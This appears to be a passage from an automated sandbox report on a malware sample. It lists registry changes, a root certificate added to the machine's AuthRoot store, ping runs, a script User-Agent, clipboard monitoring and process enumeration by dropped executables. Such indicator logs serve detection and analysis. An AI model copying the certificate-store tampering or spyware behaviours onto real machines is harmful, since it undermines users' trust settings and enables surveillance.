Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}\Instance\ N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "6" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = ffffffff N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000008e543d9212004170704461746100400009000400efbe8e543d92e55473672e0000008ce10100000001000000000000000000000000000000c97e6b004100700070004400610074006100000016000000 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 9200310000000000e554446810003732424637337e3100007a0009000400efbee5544468e55447682e0000009c310200000008000000000000000000000000000000f18b3d00370032006200660037003300300033002d0035006400630030002d0034003400650039002d0038003700640038002d00360039003800660038003600370037006100630061006200000018000000 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = ffffffff N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 5000310000000000e554446810004c6f63616c003c0009000400efbe8e543d92e55444682e0000009fe10100000001000000000000000000000000000000f18b3d004c006f00630061006c00000014000000 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\NodeSlot = "8" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 N/A N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
